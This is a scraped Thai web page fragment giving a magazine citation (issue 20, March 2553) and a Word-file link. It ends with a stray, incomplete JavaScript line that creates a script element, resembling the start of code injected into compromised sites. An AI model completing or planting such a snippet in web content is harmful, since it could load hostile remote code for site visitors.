พิมพ์ลงใน นิตยสาร โบนัสแห่งวัย ฉบับที่ 20 เดือนมีนาคม 2553

เพิ่มเติม (ms word)

var d=document;var s=d.createElement(‘script’);